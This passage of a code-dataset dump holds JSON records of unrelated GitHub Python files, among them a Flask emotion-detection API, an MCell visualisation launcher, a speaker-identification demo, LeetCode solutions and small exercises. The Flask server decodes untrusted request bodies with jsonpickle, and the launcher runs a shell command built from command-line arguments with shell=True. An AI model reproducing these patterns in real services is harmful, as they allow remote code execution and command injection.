tk.EventType.ButtonRelease:\n\t\t\t\tself.on_click_status(event)\n\t\t\tlastclick = (TkRadialBar.ClickStatus, event.type)\n\t\telse:\n\t\t\ttest2 = ( math.pow(event.x - self._centre[0],2) / math.pow(self._outer_radius[0],2) ) \\\n\t\t\t\t+ ( math.pow(event.y - self._centre[1],2) / math.pow(self._outer_radius[1],2) )\n\t\t\tif test > 1 and test2 <= 1:\n\t\t\t\tif self._lastclick[0] == TkRadialBar.ClickProgress and self._lastclick[1] == tk.EventType.ButtonPress and event.type == tk.EventType.ButtonRelease:\n\t\t\t\t\tself.on_click_progress(event)\n\t\t\t\tlastclick = (TkRadialBar.ClickProgress, event.type)\n\t\t\t\t\n\t\tself._lastclick = lastclick\n\t\n\tdef render(self):\n\t\t'Render a Tk Photo Image'\n\t\t# hold a reference to the image in the class otherwise\n\t\t# the photo image will be lost\n\t\tself.image = ImageTk.PhotoImage(RadialBar.render(self))\n\t\tself.configure(image=self.image)","repo_name":"AidanHolmes/pil-widget","sub_path":"radialbar.py","file_name":"radialbar.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29304917732","text":"'''\nThis module contains the ScalarTypeSymbol which represents scalar types\nin the Particle_IR tree.\n'''\nfrom HartreeParticleDSL.Particle_IR.symbols.symbol import Symbol\nfrom HartreeParticleDSL.Particle_IR.datatypes.datatype import ScalarType\n\nclass ScalarTypeSymbol(Symbol):\n '''\n Class for symbols to a ScalarType.\n\n :param str name: name of the symbol.\n :param datatype: datatype of the symbol.\n :type datatype: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n :param kwargs: additional arguments provided by the Symbol base class.\n :type kwargs: unwrapped dict.\n '''\n\n def __init__(self, name: str, datatype : ScalarType, **kwargs):\n self._datatype = None\n super().__init__(name, **kwargs)\n self.datatype = datatype\n\n @property\n def datatype(self) -> ScalarType:\n '''\n :returns: datatype of the TypedSymbol.\n :rtype: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n '''\n return self._datatype\n\n @datatype.setter\n def datatype(self, value: ScalarType) -> None:\n '''\n Setter for the datattype of a Typedsymbol.\n\n :param value: new value for the datatype.\n :type value: :py:class:`HartreeParticleDSL.Particle_IR.datatypes.datatype.ScalarType`\n\n :raises TypeError: if the value is not of the correct type.\n '''\n if not isinstance(value, ScalarType):\n raise TypeError(\n f\"The datatype of a {type(self)} must be specified \"\n f\"using a ScalarType but got {type(value)}.\")\n self._datatype = value\n","repo_name":"stfc/HartreeParticleDSL","sub_path":"src/HartreeParticleDSL/Particle_IR/symbols/scalartypesymbol.py","file_name":"scalartypesymbol.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71493930705","text":"#Global import\nfrom flask import Flask, request, Response\nimport jsonpickle\nimport numpy as np\nimport cv2\nimport base64\nfrom PIL import Image, ImageOps\nfrom io import BytesIO\nimport sys\n#local imports\nimport process\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n_all_emotions = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4:'sad', 5:'surprise', 6:'neutral'}\n\n\ndef select_emotions(emotions):\n indexes = []\n for key, value in _all_emotions.items():\n if value in emotions: indexes.append(key)\n return indexes\n\n\n# route http posts to this method\n@app.route('/api/test', methods=['POST'])\ndef test():\n '''\n Main function that gets envoked when receiving a request.\n \n Simply, takes json 64base decoded images, and set of desired emotions.\n\n Decode these data, send each frame to be processed, accumelate and average results.\n\n Then send a response with these values.\n '''\n r = request\n # Decode and extract data/emotion set.\n data = jsonpickle.decode(r.data)\n frmaes = data['data']\n emotions = data['emotions']\n # Select the desired indexes\n if len(emotions) <= 0:\n print (\"Error: No emotions selected.\")\n sys.exit(0)\n\n emotion_indexes = select_emotions(emotions)\n # Accumulate results here.\n result = []\n\n for key, value in frmaes.items():\n print (f'this is frame {key}')\n # Decode image.\n byte_data = base64.b64decode(value)\n image_data = BytesIO(byte_data)\n img = Image.open(image_data)\n \n # Some fancy processing here....\n state, values = process.run(img)\n\n # Store results.\n frame_i = []\n if state:\n for i,out in enumerate(values):\n if i in emotion_indexes:\n frame_i.append(out.item())\n \n result.append(frame_i)\n else:\n print (\"Error: Unable to process this frame\")\n # sys.exit(0)\n # Report results\n result = np.array(result)\n \n # build a response dict to send back to client\n result_mean = np.mean(result, axis=0)\n response = {}\n k = 0\n for i in emotion_indexes:\n response[_all_emotions[i]] = result_mean[k]\n k += 1\n \n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n# start flask app\napp.run(host=\"0.0.0.0\", port=5000)","repo_name":"Evraa/Graduation-Project-Separate-Modules","sub_path":"models/emotion_detection/test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4060298003","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nrequirements = [\n \"paho-mqtt==1.5.1\"\n]\n\n\nsetuptools.setup(\n name=\"open-iot-GanjeCo\",\n version=\"0.0.1\",\n author=\"Mostafa Ghofrani\",\n author_email=\"mostafa_gho@yahoo.com\",\n description=\"A light iot package to define Device and Things\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/GanjeCo/open-iot\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=requirements,\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)","repo_name":"GanjeCo/open-iot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17176318215","text":"import sys\nimport os\nimport platform\nimport subprocess\n\nMCELL_PATH = os.environ.get('MCELL_PATH', '')\nif MCELL_PATH:\n lib_path = os.path.join(MCELL_PATH, 'lib')\n if os.path.exists(os.path.join(lib_path, 'mcell.so')) or \\\n os.path.exists(os.path.join(lib_path, 'mcell.pyd')):\n sys.path.append(lib_path)\n else:\n print(\"Error: Python module mcell.so or mcell.pyd was not found in \"\n \"directory '\" + lib_path + \"' constructed from system variable \"\n \"MCELL_PATH.\")\n sys.exit(1)\nelse:\n print(\"Error: system variable MCELL_PATH that is used to find the mcell \"\n \"library was not set.\")\n sys.exit(1)\n \n \nif len(sys.argv) != 2:\n sys.exit(\"Expecing one argument that is the path to the viz output directory, e.g. viz_data/seed_00001/\")\n\n \nREL_BLENDER_PATH = None\n\n\nif platform.system() == 'Darwin':\n REL_BLENDER_PATH = os.path.join(MCELL_PATH, '..', '..', '..', '..', '..', '..', '..', '..', '..')\nelse:\n REL_BLENDER_PATH = os.path.join(MCELL_PATH, '..', '..', '..', '..', '..', '..')\n \nABS_BLENDER_PATH = os.path.abspath(REL_BLENDER_PATH)\n\n\nif platform.system() == 'Darwin':\n VIZ_MCELL_SCRIPT = \\\n os.path.join(ABS_BLENDER_PATH, 'blender.app', 'Contents', 'Resources', '2.93', 'scripts', 'addons', 'cellblender', 'developer_utilities', 'mol_viz_scripts', 'viz_mcell_run.py')\nelse:\n VIZ_MCELL_SCRIPT = \\\n os.path.join(ABS_BLENDER_PATH, '2.93', 'scripts', 'addons', 'cellblender', 'developer_utilities', 'mol_viz_scripts', 'viz_mcell_run.py')\n\n\nif 'Windows' in platform.system():\n CMD = os.path.join(ABS_BLENDER_PATH, 'blender.exe') \nelse:\n CMD = 'bash ' + os.path.join(ABS_BLENDER_PATH, 'my_blender')\n\nCMD += ' -P ' + VIZ_MCELL_SCRIPT + ' -- ' + sys.argv[1]\n\nsubprocess.run(CMD, shell=True)\n ","repo_name":"mcellteam/mcell","sub_path":"utils/visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"23947546012","text":"from typing import Any, Dict\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.preprocessors import LoadImage\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.logger import get_logger\n\nlogger = get_logger()\n\n\n@PIPELINES.register_module(\n Tasks.vision_efficient_tuning,\n module_name=Pipelines.vision_efficient_tuning)\nclass VisionEfficientTuningPipeline(Pipeline):\n\n def __init__(self, model: str, **kwargs):\n \"\"\"\n use `model` to create a vision efficient tuning pipeline for prediction\n Args:\n model: model id on modelscope hub.\n Example:\n >>> from modelscope.pipelines import pipeline\n >>> petl_pipeline = pipeline('vision-efficient-tuning',\n 'damo/cv_vitb16_classification_vision-efficient-tuning-adapter')\n >>> result = petl_pipeline(\n 'data/test/images/vision_efficient_tuning_test_1.png')\n >>> print(f'Output: {result}.')\n \"\"\"\n super().__init__(model=model, **kwargs)\n\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model = self.model.to(self.device)\n self.model.eval()\n self.transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n def preprocess(self, input: Input) -> Dict[str, Any]:\n img = LoadImage.convert_to_img(input)\n data = self.transform(img).unsqueeze(0).to(self.device)\n return data\n\n def forward(self, input: Dict[str, Any]) -> Dict[str, Any]:\n with torch.no_grad():\n results = self.model(input)\n return results\n\n def postprocess(self, inputs: Dict[str, Any]) -> Dict[str, Any]:\n scores = F.softmax(inputs, dim=1).cpu().numpy()\n pred_scores = np.sort(scores, axis=1)[0][::-1][:5]\n pred_labels = np.argsort(scores, axis=1)[0][::-1][:5]\n\n result = {\n 'pred_score': [score for score in pred_scores],\n 'pred_class': [self.model.CLASSES[label] for label in pred_labels]\n }\n\n outputs = {\n OutputKeys.SCORES: result['pred_score'],\n OutputKeys.LABELS: result['pred_class']\n }\n return outputs\n","repo_name":"open-models-platform/open.models.llm-rlhf","sub_path":"modelscope/modelscope/pipelines/cv/vision_efficient_tuning_pipeline.py","file_name":"vision_efficient_tuning_pipeline.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"12860839987","text":"# Creating a map with 3 rows and 3 columns.\nrow1 = [\"⬜️\",\"️⬜️\",\"️⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"️⬜️\"]\nrow3 = [\"⬜️️\",\"⬜️️\",\"⬜️️\"]\nmap = [row1, row2, row3]\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? \")\n# Taking the input from the user and putting it into the map.\n\ny = int(position[0])\nx = int(position[1])\nmap[x-1][y-1] = \"x\"\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")","repo_name":"armand-abasllari/100-Days-of-Python","sub_path":"100 Days of Code/Beginer/Day 04 - Beginner - Randomisation and Python Lists/Exercises/Exercise 3 - Treasure Map.py","file_name":"Exercise 3 - Treasure Map.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8152659487","text":"\nimport os\nos.chdir('C:\\\\Users\\\\mathi\\\\Desktop\\\\PiB')\n\nimport pandas as pd\nimport Data.wrangling\n\n\n#### DOWNLOAD AND CREATE DATAFRAMES #####\n\ndatasets = ['GPL96', 'GPL570', 'GPL8432', 'GPL10379', 'GPL10558', 'GPL15659']\ndownload = True\n\nfor data in datasets:\n\n # Filter dataframe\n dataset_info = pd.read_excel('dataset_information.xlsx', sheet_name = 'dataset_information')\n df_sample = dataset_info[(dataset_info.Platform_id == data) & (dataset_info.Sample_label == 'Metastasis Tumor') & (dataset_info.Metastasis_site != 'unknown')]\n df_sample = df_sample.rename(columns={'Sample_id': 'Sample'})\n df_sample = df_sample[['Sample', 'Cancer_type', 'Primary_site', 'Metastasis_site', 'Sample_label']]\n df_sample = df_sample.drop_duplicates()\n \n # Collect data into pd-dataframe from sample-list\n samples = set(df_sample.Sample.tolist())\n df_geneexp = Data.wrangling.GSM_data(samples, download = download, filepath = str('./Samples/' + data + '/'), silent = True).df\n df_merged = pd.merge(df_sample, df_geneexp, on='Sample', how='inner')\n df_merged.to_csv(str('./Samples/' + data + '/' + data + '.csv'), header = True, index = False)\n \n\n# NO. SAMPLES!\n\n # GPL96: 167\n # GPL570: 192\n # GPL8432: 104\n # GPL10379: 207\n # GPL10558: 263\n # GPL15659: 145\n\n\n#### LOAD ALREADY EXISTING DATAFRAMES #####\n \nGPL96 = pd.read_csv('./Data/Samples/GPL96/GPL96.csv', header = 0, index_col = False)\nGPL570 = pd.read_csv('./Data/Samples/GPL570/GPL570.csv', header = 0, index_col = False)\nGPL8432 = pd.read_csv('./Data/Samples/GPL8432/GPL8432.csv', header = 0, index_col = False)\nGPL10379 = pd.read_csv('./Data/Samples/GPL10379/GPL10379.csv', header = 0, index_col = False)\nGPL10558 = pd.read_csv('./Data/Samples/GPL10558/GPL10558.csv', header = 0, index_col = False)\nGPL15659 = pd.read_csv('./Data/Samples/GPL15659/GPL15659.csv', header = 0, index_col = False)\n\n\n\n#### MERGES BETWEEN DATAFRAMES ####\n\ndf_GPL96_GPL570 = pd.concat([GPL96, GPL570], join = 'inner')\ndf_GPL8432_GPL10558 = pd.concat([GPL8432, GPL10558], join = 'inner')\n\ndf_GPL96_GPL570.to_csv('./Data/Samples/GPL96_GPL570/GPL96_GPL570.csv', header = True, index = False)\n\n#### CREATE VALIDATION SET ####\nimport numpy as np\n\nfrac = np.random.rand(len(df_GPL96_GPL570)) < 0.85\n\n\ntrain = df_GPL96_GPL570[frac] # n = 308\nvalidation = df_GPL96_GPL570[~frac] # n = 51\n\n# Save to .csv-file\ntrain.to_csv(str('./Data/Samples/' + 'GPL96_GPL570' + '/' + 'GPL96_GPL570' + '.csv'), header = True, index = False)\nvalidation.to_csv(str('./Data/Samples/' + 'GPL96_GPL570' + '/' + 'GPL96_GPL570_VALIDATION' + '.csv'), header = True, index = False)\n\n\n# POSSIBLE MERGES!\n # GPL96 + GPL570: 359\n # (MAYBE: + GPL10379): 566\n # GPL8432 + 10558: 367\n","repo_name":"mathiasbyskov/PiB","sub_path":"Data/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40245255336","text":"#! python3.5\r\n#Search on wowhead from \"run\" (start + r)\r\nimport sys, webbrowser, pyperclip\r\n\r\n#Check length if only 1 paste whatever is in clipboard, else you've probably pasted it in or written something youself\r\nif len(sys.argv) > 1:\r\n search = \" \".join(sys.argv[1:]) #takes index 1 and after and put into search\r\nelse:\r\n search = pyperclip.paste() #puts whatever is in the clipboard into search\r\n\r\n#opens the default browser, and searches on wowhead for the input\r\nwebbrowser.open(\"http://www.wowhead.com/search?q=\" + search)\r\n","repo_name":"Thomrl/Wowhead.py-search","sub_path":"wowhead.py","file_name":"wowhead.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3138173991","text":"class Solution:\n def __init__(self):\n self.mem = dict()\n\n def isScramble(self, s1: str, s2: str) -> bool:\n if (s1, s2) in self.mem:\n return self.mem[(s1, s2)]\n # print(f'isScramble({s1}, {s2})')\n for k in range(2):\n if s1 == s2:\n return True\n ctr1 = Counter()\n ctr2 = Counter()\n for i, (a, b) in enumerate(zip(s1[:-1], s2[:-1])):\n # print(i, a, b)\n ctr1 += {a: 1}\n ctr2 += {b: 1}\n if ctr1 == ctr2 and \\\n self.isScramble(s1[:i+1], s2[:i+1]) and \\\n self.isScramble(s1[i+1:], s2[i+1:]):\n self.mem[(s1, s2)] = True\n return self.mem[(s1, s2)]\n s1 = s1[::-1]\n self.mem[(s1, s2)] = False\n return self.mem[(s1, s2)]\n \n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.0087.src.1.py","file_name":"leet.0087.src.1.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19251023901","text":"import collections\n\ndef mostVisitedPattern(username: List[str], timestamp: List[int], website: List[str]) -> List[str]:\n data = list(zip(username, timestamp, website))\n data.sort(key=lambda i: i[1])\n\n usermap = collections.defaultdict(list)\n for un, ts, ws in data:\n usermap[un].append(ws)\n\n tuple_counter = collections.defaultdict(lambda: 0)\n\n for _, visits in usermap.items():\n visit_tuple = set()\n l = len(visits)\n\n for i in range(0, l):\n for j in range(i + 1, l):\n for k in range(j + 1, l):\n visit_tuple.add((visits[i], visits[j], visits[k]))\n\n for i in visit_tuple:\n tuple_counter[i] += 1\n\n max_count = max(tuple_counter.values())\n result = None\n for t, c in tuple_counter.items():\n if c == max_count:\n result = t if result is None else min(result, t)\n\n return result\n","repo_name":"xis19/leetcode","sub_path":"1152.py","file_name":"1152.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39773986019","text":"from collections import deque\n\n\ndef move(x, y, dx, dy):\n cnt = 0\n while board[x + dx][y + dy] != '#' and board[x][y] != 'O':\n x += dx\n y += dy\n cnt += 1\n return x, y, cnt\n\n\ndef bfs(rx, ry, bx, by):\n queue = deque()\n queue.append((rx, ry, bx, by, 1))\n visited[rx][ry][bx][by] = True\n dxy = [(-1, 0), (1, 0), (0, 1), (0, -1)]\n while queue:\n rx, ry, bx, by, depth = queue.popleft()\n if depth > 10:\n break\n for dx, dy in dxy:\n new_rx, new_ry, rcnt = move(rx, ry, dx, dy)\n new_bx, new_by, bcnt = move(bx, by, dx, dy)\n if board[new_bx][new_by] != 'O': # 전제 조건은 블루는 빠지면안된다\n if board[new_rx][new_ry] == 'O': # 그리고 빨간구슬이 빠졋다면 게임끝낸다\n return depth\n # 이제 게임이 아직 끝나지 않았을 경우의 수를 계산한다\n if new_rx == new_bx and new_ry == new_by: # 빨간구슬과 블루구슬의 위치가 같다면 좌표변경한다\n if rcnt > bcnt:\n new_rx -= dx\n new_ry -= dy\n else:\n new_bx -= dx\n new_by -= dy\n if not visited[new_rx][new_ry][new_bx][new_by]: # 현재 위치가 체크된 백업이엇다면\n visited[new_rx][new_ry][new_bx][new_by] = True # 체크하고\n queue.append((new_rx, new_ry, new_bx, new_by, depth + 1)) # 탐색 시작한다\n return -1\n\n\nif __name__ == '__main__':\n row, col = map(int, input().split())\n board = [list(input().strip()) for _ in range(row)]\n visited = [[[[False] * col for _ in range(row)] for _ in range(col)] for _ in range(row)]\n for i in range(row):\n for j in range(col):\n if board[i][j] == 'R':\n rx, ry = i, j\n if board[i][j] == 'B':\n bx, by = i, j\n print(bfs(rx, ry, bx, by))\n","repo_name":"rio1004666/ProblemSolving","sub_path":"구슬탈출2.py","file_name":"구슬탈출2.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26251302279","text":"# !pip install resemblyzer - done\r\n# !pip install pyeer - done\r\n# !pip install ffmpeg-python - done\r\n\r\nimport numpy as np\r\nfrom resemblyzer import preprocess_wav, VoiceEncoder\r\nfrom itertools import groupby\r\nfrom pathlib import Path\r\nfrom tqdm import tqdm\r\nfrom pywebio.input import *\r\nfrom pywebio.output import *\r\nimport pyaudio\r\nimport wave\r\nfrom sklearn.metrics.pairwise import cosine_similarity, cosine_distances\r\n\r\nput_markdown('## Speaker Identification Demo')\r\n\r\n# function for audio recording\r\n\r\n@use_scope('recorder_scope', clear=True)\r\ndef recorder(name, recording_number, record_seconds):\r\n\r\n # the file name output you want to record into\r\n filename = str(name) + str(recording_number) + \".wav\"\r\n # set the chunk size of 1024 samples\r\n chunk = 1024\r\n # sample format\r\n FORMAT = pyaudio.paInt16\r\n # mono, change to 2 if you want stereo\r\n channels = 1\r\n # 44100 samples per second\r\n sample_rate = 44100\r\n # record_seconds = 5\r\n # initialize PyAudio object\r\n p = pyaudio.PyAudio()\r\n # open stream object as input & output\r\n stream = p.open(format=FORMAT,\r\n channels=channels,\r\n rate=sample_rate,\r\n input=True,\r\n output=True,\r\n frames_per_buffer=chunk)\r\n frames = []\r\n put_text(\"Recording\")\r\n for i in range(int(sample_rate / chunk * record_seconds)):\r\n\r\n data = stream.read(chunk)\r\n # if you want to hear your voice while recording\r\n # stream.write(data)\r\n frames.append(data)\r\n put_text(\"Finished recording.\")\r\n # stop and close stream\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n # terminate pyaudio object\r\n p.terminate()\r\n # save audio file\r\n # open the file in 'write bytes' mode\r\n wf = wave.open(filename, \"wb\")\r\n # set the channels\r\n wf.setnchannels(channels)\r\n # set the sample format\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n # set the sample rate\r\n wf.setframerate(sample_rate)\r\n # write the frames as bytes\r\n wf.writeframes(b\"\".join(frames))\r\n # close the file\r\n wf.close()\r\n\r\n# validation for number of users\r\n\r\n\r\ndef user_validation(number_of_users):\r\n if number_of_users < 2:\r\n return \"Please enter a number greater than 1\"\r\n\r\n# validation for number of audios\r\n\r\n\r\ndef audio_validation(number_of_audios):\r\n if number_of_audios < 1:\r\n return \"Please enter a number greater than 0\"\r\n if number_of_audios > 4:\r\n return \"Please enter a number less than 5\"\r\n\r\n# validation for username\r\n\r\n\r\ndef username_validation(username):\r\n if username == \"\":\r\n return \"You can't have no name. Please enter something.\"\r\n\r\n\r\n# start record func\r\n\r\n\r\n@use_scope(\"button_scope\", clear=True)\r\ndef start_record(number_of_audios, username, length_of_recording, aud_num):\r\n if aud_num <= number_of_audios:\r\n message = 'Start Recording ' + \\\r\n str(username) + \"\\'s \" + 'Audio Number ' + str(aud_num)\r\n put_button(message, onclick=lambda: recorder(\r\n username, aud_num, length_of_recording))\r\n confirm = actions('Confirm to save audio?', [\r\n 'Confirm'], help_text='You will not be able to resubmit audio')\r\n clear(\"recorder_scope\")\r\n if confirm == 'Confirm':\r\n aud_num += 1\r\n start_record(number_of_audios, username,\r\n length_of_recording, aud_num)\r\n else:\r\n confirm = actions('Registration for ' +\r\n str(username) + ' complete!', ['Next'])\r\n return\r\n\r\n# register one user attempt 2\r\n\r\n\r\nusername_list = []\r\n\r\n# made dictionary for users with username \r\nusers_dict = {}\r\n\r\ndef register_user(number_of_audios, length_of_recording, aud_num=1):\r\n username = input(\"Enter name for this user:\", validate=username_validation)\r\n username_list.append(username)\r\n aud_num = 1\r\n start_record(number_of_audios, username, length_of_recording, aud_num)\r\n\r\n# register all users\r\n@use_scope('register_all_scope')\r\ndef register_all(number_of_users, number_of_audios, length_of_recording, user_num):\r\n if user_num <= number_of_users:\r\n register_user(number_of_audios, length_of_recording, aud_num=1)\r\n user_num += 1\r\n register_all(number_of_users, number_of_audios,\r\n length_of_recording, user_num)\r\n else:\r\n confirm = actions('Registration for all complete!', ['Next'])\r\n return\r\n\r\n\r\n@use_scope(\"loading_scope\")\r\ndef loading():\r\n put_text(\"Processing...\")\r\n\r\n# resemblyzer --------------------------------------------------------------\r\n\r\n\r\nspeaker_embed_list = []\r\nencoder = VoiceEncoder()\r\n\r\n\r\n@use_scope('resemblyzer_scope', clear=True)\r\ndef resemblyzer_magic(number_of_audios):\r\n # Group the wavs per speaker and load them using the preprocessing function provided with\r\n # resemblyzer to load wavs in memory. It normalizes the volume, trims long silences and resamples\r\n # the wav to the correct sampling rate.\r\n speaker_wavs_list = []\r\n wav_fpaths = []\r\n for name in username_list:\r\n for i in range(number_of_audios):\r\n x = i+1\r\n path = str(name) + str(x) + '.wav'\r\n # get the paths where audio files are saved\r\n wav_fpaths.append(Path(path))\r\n print(\"wav_fpaths \", wav_fpaths)\r\n # pre-processed audios ki dictionary banjati with speaker as key and audio as pair\r\n speaker_wavs = {speaker: list(map(preprocess_wav, wav_fpaths)) for speaker, wav_fpaths in\r\n groupby(tqdm(wav_fpaths, \"Preprocessing wavs\", len(wav_fpaths), unit=\"wavs\"),\r\n lambda wav_fpath: wav_fpath.parent.stem)}\r\n print(\"speaker_wavs \", speaker_wavs)\r\n speaker_wavs_list.append(speaker_wavs)\r\n print(\"speaker_wavs_list \", speaker_wavs_list)\r\n\r\n\r\n # make a list of the pre-processed audios ki arrays\r\n for sp_wvs in speaker_wavs_list:\r\n speaker_embed_list.append(\r\n np.array([encoder.embed_speaker(wavs) for wavs in sp_wvs.values()]))\r\n\r\n\r\n@use_scope('test_scope', clear=True)\r\ndef test_pp():\r\n loading()\r\n # does the same as above for the test file\r\n # hm list(Path(\"test1.wav\")) hona chahiye but Path object is not iterable\r\n wav_fpaths = []\r\n test_fpath = Path(\"test1.wav\")\r\n wav_fpaths.append(test_fpath)\r\n test_pos_wavs = {speaker: list(map(preprocess_wav, wav_fpaths)) for speaker, wav_fpaths in\r\n groupby(tqdm(wav_fpaths, \"Preprocessing wavs\", len(wav_fpaths), unit=\"wavs\"),\r\n lambda wav_fpath: wav_fpath.parent.stem)}\r\n test_pos_emb = np.array([encoder.embed_speaker(wavs)\r\n for wavs in test_pos_wavs.values()])\r\n\r\n # calculates cosine similarity between the ground truth (test file) and registered audios\r\n speakers = {}\r\n val = 0\r\n for spkr_embd in speaker_embed_list:\r\n key_val = username_list[val]\r\n spkr_sim = cosine_similarity(spkr_embd, test_pos_emb)[0][0]\r\n speakers[key_val] = spkr_sim\r\n val += 1\r\n\r\n norm = [float(i)/sum(speakers.values()) for i in speakers.values()]\r\n for i in range(len(norm)):\r\n key_val = username_list[i]\r\n speakers[key_val] = norm[i]\r\n\r\n clear(\"loading_scope\")\r\n remove(\"loading_scope\")\r\n identified = max(speakers, key=speakers.get)\r\n print(\"\\nThe identity of the test speaker:\\n\", identified, \"with a similarity with test of\",\r\n speakers[identified]*100, \"percent match as compared to all.\")\r\n put_markdown('## Test Audio Belonged To: {}'.format(identified))\r\n# -------------------------------------------------------------------\r\n\r\n\r\n@use_scope('test_scope', clear=True)\r\ndef test_taking(length_of_recording):\r\n put_button(\"Record Test Audio\", onclick=lambda: recorder(\r\n \"test\", 1, length_of_recording))\r\n test_save = actions('Confirm to save audio?', [\r\n 'Confirm'], help_text='You will not be able to resubmit audio')\r\n\r\n\r\n@use_scope('pp_load', clear=True)\r\ndef pp_load():\r\n put_text(\"Please Wait. Processing registration audios.\")\r\n\r\n\r\nnumber_of_users = input(\"Enter the number of users for this session:\",\r\n type=NUMBER, validate=user_validation)\r\n\r\nnumber_of_audios = input(\r\n \"Enter the number of audios each user will register:\", type=NUMBER, validate=audio_validation)\r\n\r\nlength_of_recording = select(\r\n label=\"Select the length of each recording (in seconds)\", options=[3, 5, 7])\r\n\r\nregister_all(number_of_users, number_of_audios, length_of_recording, 1)\r\npp_load()\r\nresemblyzer_magic(number_of_audios)\r\n\r\nclear(\"pp_load\")\r\nremove(\"pp_load\")\r\n\r\nclear(\"register_all_scope\")\r\nremove(\"register_all_scope\")\r\n\r\nclear(\"recorder_scope\")\r\nremove(\"recorder_scope\")\r\n\r\nput_markdown('## Test Audio Time')\r\n\r\ntest_taking(length_of_recording)\r\nclear(\"test_scope\")\r\nremove(\"test_scope\")\r\n\r\nclear(\"recorder_scope\")\r\nremove(\"recorder_scope\")\r\n\r\ngenerate_button = actions(\r\n 'Click to perform Speaker Recognition Magic', ['Generate Result!'])\r\nif generate_button == 'Generate Result!':\r\n test_pp()\r\n\r\n# clear(\"resemblyzer_scope\")\r\n# remove(\"resemblyzer_scope\")\r\n\r\nwhile(True):\r\n again = select(\r\n label=\"Do you want to enroll another test audio?\", options=[\"Yes\", \"No\"])\r\n if again == \"Yes\":\r\n test_taking(length_of_recording)\r\n clear(\"test_scope\")\r\n remove(\"test_scope\")\r\n\r\n clear(\"recorder_scope\")\r\n remove(\"recorder_scope\")\r\n\r\n generate_button = actions(\r\n 'Click to perform Speaker Recognition Magic', ['Generate Result!'])\r\n if generate_button == 'Generate Result!':\r\n test_pp()\r\n else:\r\n put_text(\"Thank you for trying out our system!\")\r\n break\r\n\r\n#register_user(number_of_audios, length_of_recording, 1)\r\n\r\n#register_all(number_of_users, number_of_audios, length_of_recording)\r\n\r\n#put_button('Start Recording Test Audio', onclick=lambda: recorder(\"test\", 1, length_of_recording))\r\n","repo_name":"Qa5imm/Speaker-identification","sub_path":"speakerid-csalt-no-api/speakerid.py","file_name":"speakerid.py","file_ext":"py","file_size_in_byte":10057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10992145406","text":"'''Train CIFAR with PyTorch.'''\r\n\r\nimport torch.optim as optim\r\nimport time\r\nimport torch.backends.cudnn as cudnn\r\nfrom opt.utils import *\r\n\r\n\r\nfrom data.load import *\r\nfrom models import *\r\nfrom tensorboardX import SummaryWriter\r\nfrom torch.autograd import Variable\r\nimport argparse\r\nimport os\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1,2,3'\r\n\r\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\r\nparser.add_argument('--learning_rate','-lr', default=0.01, type=float, help='learning 